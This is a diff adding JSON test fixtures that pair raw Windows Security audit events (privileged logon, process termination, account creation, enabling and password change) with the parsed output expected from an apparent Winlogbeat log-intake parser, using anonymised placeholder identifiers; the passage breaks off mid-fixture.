"kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..22840d53c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..03a0543f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -0,0 +1,127 @@ +{ + "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..99debf8cf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..ac581308e --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 